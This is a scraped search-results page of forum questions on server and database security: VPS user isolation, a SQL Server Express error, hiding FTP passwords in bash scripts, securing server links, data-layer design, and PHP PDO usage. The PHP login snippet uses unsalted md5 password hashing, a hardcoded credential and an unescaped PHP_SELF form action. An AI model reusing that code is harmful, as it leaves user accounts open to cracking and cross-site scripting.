I just got a VPS sver the other day, I'm new to server administration, but not that new to Ubuntu (11.04). I use it in my living room as the HTPC, and I had a previous VPS that I used on and off for a team speak server. This one I'm setting up for long term use. So I would like to know the best practice when it comes to websites and tasks that I have the server proforming. I understand that it could be beneficial to separate each website into it's own usergroup or under its own username. I would setup nginx so that it could read all of the users directors (and thus each website) but could not touch anything else. The same with the TeamSpeak, should I make a user for TeamSpeak so that it operates within its own confined area or is this overkill? I do have access to root on the sever and my current plan is to run about 4 websites and a TeamSpeak server. My stack is Linux (Ubuntu 11.04 LTS), nginx, and PHP 5.4.3 (using the PDO SQLite 3 built in driver for the database). Should PHP have it's own user group or is it ok to place it in with nginx?

Read the article
Failed to generate a user instance of SQL Server

- by Goondocks

I'm using Windows 7 Beta and trying to install a web application locally. This web site uses Microsoft SQL Server 2005 Express (SQLEXPRESS) and a MDB file in the web site's ~/App_Data folder. I was instructed to configure IIS7 to use Classic .NET AppPool for this web application. Each time the web site loads, I receive the following error: There was an error trying to connect to the Database Server: Failed to generate a user instance of SQL Server due to failure in retrieving the user's local application data path. Please make sure the user has a local user profile on the computer. The connection will be closed. The Internet is packed with articles written on this subject. The prevailing wisdom seems to be: Configure the SQL Express Service to use the Local System account. Delete the following directory: C:\Users\username\AppData\Microsoft\Microsoft SQL Server Data\SQLEXPRESS Neither of these fixes have made any impact. I have tinkered with permissions and settings for hours to no avail. Can anyone suggest a fix or help me understand how to get more detailed information about the problem.

Read the article
Securing bash scripts

- by minnur

Hi There, Does anybody know what is the best way to secure bash scripts. I have a script which creates database and source code backup and ftp it to other server. And login/password for destination ftp are plain text. I need somehow encrypt it or hide it in case of website hacking. Or should i create script written on C to create bash file then run it and delete ? Thanks. Thanks for the answers and I am sorry, i wasn't clear enough. I would like to clarify my question in the following items. We are storing the data in Rackspace Cloud files. We can't pull as Cloud files doesn't allow you run a script. We can write the script to run on Server A and pull FTP and MySQL data on servers B, C, D, etc. And we want to protect the passwords on A from the situation where A is hacked. Can we compile our script file to hide them? Thanks

Read the article
securing communication between 2 Linux servers on local network for ports only they need access to

- by gkdsp

I have two Linux servers connected to each other via a cross-connect cable, forming a local network. One of the servers presents a DMZ for the other server (e.g. database server) that must be very secure. I'm restricting this question to communication between the two servers for ports that only need to be available to these servers (and no one else). Thus, communication between the two servers can be established by: (1) opening the required port(s) on both servers, and authenticating according to the applications' rules. (2) disabling IP Tables associated with the NIC cards the cross-connect cable is attached to (on both servers). Which method is more secure? In the first case, the needed ports are open to the external world, but protected by user name and password. In the second case, none of the needed ports are open to the outside world, but since the IP Tables are disabled for the NIC cards associated with the cross-connect cables, essentially all of the ports may be considered to be "open" between the two servers (and so if the server creating the DMZ is compromized, the hacker on the DMZ server could view all ports open using the cross-connect cable). Any conventional wisdom how to make the communication secure between two servers for ports only these servers need access to?

Read the article
Architecture for a business objects / database access layer

- by gregmac

For various reasons, we are writing a new business objects/data storage library. One of the requirements of this layer is to separate the logic of the business rules, and the actual data storage layer. It is possible to have multiple data storage layers that implement access to the same object - for example, a main "database" data storage source that implements most objects, and another "ldap" source that implements a User object. In this scenario, User can optionally come from an LDAP source, perhaps with slightly different functionality (eg, not possible to save/update the User object), but otherwise it is used by the application the same way. Another data storage type might be a web service, or an external database. There are two main ways we are looking at implementing this, and me and a co-worker disagree on a fundamental level which is correct. I'd like some advice on which one is the best to use. I'll try to keep my descriptions of each as neutral as possible, as I'm looking for some objective view points here. Business objects are base classes, and data storage objects inherit business objects. Client code deals with data storage objects. In this case, common business rules are inherited by each data storage object, and it is the data storage objects that are directly used by the client code. This has the implication that client code determines which data storage method to use for a given object, because it has to explicitly declare an instance to that type of object. Client code needs to explicitly know connection information for each data storage type it is using. If a data storage layer implements different functionality for a given object, client code explicitly knows about it at compile time because the object looks different. If the data storage method is changed, client code has to be updated. Business objects encapsulate data storage objects. In this case, business objects are directly used by client application. Client application passes along base connection information to business layer. Decision about which data storage method a given object uses is made by business object code. Connection information would be a chunk of data taken from a config file (client app does not really know/care about details of it), which may be a single connection string for a database, or several pieces connection strings for various data storage types. Additional data storage connection types could also be read from another spot - eg, a configuration table in a database that specifies URLs to various web services. The benefit here is that if a new data storage method is added to an existing object, a configuration setting can be set at runtime to determine which method to use, and it is completely transparent to the client applications. Client apps do not need to be modified if data storage method for a given object changes. Business objects are base classes, data source objects inherit from business objects. Client code deals primarily with base classes. This is similar to the first method, but client code declares variables of the base business object types, and Load()/Create()/etc static methods on the business objects return the appropriate data source-typed objects. The architecture of this solution is similar to the first method, but the main difference is the decision about which data storage object to use for a given business object is made by the business layer, not the client code. I know there are already existing ORM libraries that provide some of this functionality, but please discount those for now (there is the possibility that a data storage layer is implemented with one of these ORM libraries) - also note I'm deliberately not telling you what language is being used here, other than that it is strongly typed. I'm looking for some general advice here on which method is better to use (or feel free to suggest something else), and why.

Read the article
PHP: Proper way of using a PDO database connection in a class

- by Cortopasta

Trying to organize all my code into classes, and I can't get the database queries to work inside a class. I tested it without the class wrapper, and it worked fine. Inside the class = no dice. What about my classes is messing this up? class ac { public function dbConnect() { global $dbcon; $dbInfo['server'] = "localhost"; $dbInfo['database'] = "sn"; $dbInfo['username'] = "sn"; $dbInfo['password'] = "password"; $con = "mysql:host=" . $dbInfo['server'] . "; dbname=" . $dbInfo['database']; $dbcon = new PDO($con, $dbInfo['username'], $dbInfo['password']); $dbcon->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $error = $dbcon->errorInfo(); if($error[0] != "") { print "DATABASE CONNECTION ERROR:"; print_r($error); } } public function authentication() { global $dbcon; $plain_username = $_POST['username']; $md5_password = md5($_POST['password']); $ac = new ac(); if (is_int($ac->check_credentials($plain_username, $md5_password))) { ?> Welcome!  <?php } else { ?> Not a valid username and/or password. Please try again. <?php unset($_POST['username']); unset($_POST['password']); $ui = new ui(); $ui->start(); } } private function check_credentials($plain_username, $md5_password) { global $dbcon; $userid = $dbcon->prepare('SELECT id FROM users WHERE username = :username AND password = :password LIMIT 1'); $userid->bindParam(':username', $plain_username); $userid->bindParam(':password', $md5_password); $userid->execute(); print_r($dbcon->errorInfo()); $id = $userid->fetch(); Return $id; } } And if it's any help, here's the class that's calling it: require_once("ac/acclass.php"); $ac = new ac(); $ac->dbconnect(); class ui { public function start() { if ((!isset($_POST['username'])) && (!isset($_POST['password']))) { $ui = new ui(); $ui->loginform(); } else { $ac = new ac(); $ac->authentication(); } } private function loginform() { ?> <form id="userlogin" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> User:<input type="text" name="username"/> Password:<input type="password" name="password"/> <input type="submit" value="submit"/> </form> <?php } }

Read the article

Search Results

Search found 41147 results on 1646 pages for 'database security'.

Page 275/1646 | < Previous Page | 271 272 273 274 275 276 277 278 279 280 281 282 | Next Page >

- by James

- by Mong134

- by Rob

- by Martin

- by wpearse

- by K-Bell

- by blu

- by ricsmania

- by Sarah HSL

- by DaGhostman Dimitrov

- by alanmoo

- by mark4asp

- by Hala Qaseam

- by Matthew

- by Rahima farzana.S

- by Justin

- by XXL

- by Silver89

- by tommed

- by Mark Tomlin

- by Goondocks

- by minnur

- by gkdsp

- by gregmac

- by Cortopasta

< Previous Page | 271 272 273 274 275 276 277 278 279 280 281 282 | Next Page >